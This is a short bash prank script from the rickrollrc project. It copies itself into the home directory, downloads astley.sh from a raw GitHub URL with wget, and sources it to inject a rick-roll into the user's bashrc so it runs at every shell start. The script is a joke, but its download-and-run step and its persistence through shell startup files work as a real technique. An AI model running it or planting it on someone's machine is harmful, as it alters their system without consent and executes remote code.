#!/bin/bash
# Instant rick-roll to bashrc injection ;)
# 2013.03.10
script='astley.sh'
rickroll="$HOME/.${script}"
happy_place="$HOME/lulz"
remote="https://raw.github.com/keroserene/rickrollrc/master/${script}"

# For maximal lulz, ensure permissions on this script are a nice, friendly 777.
my_head=${BASH_SOURCE[0]}
base=$(dirname $my_head)
[[ $my_head != $happy_place ]] && cp -f $my_head $happy_place

# Ensure the rickrollin keeps rollin
localastley="${base}/astley.sh"
[[ -f $localastley ]] && cp -f $localastley $rickroll || wget $remote -O $rickroll

. $rickroll inject evil src
# And of course, where would we be without this?
. $rickroll
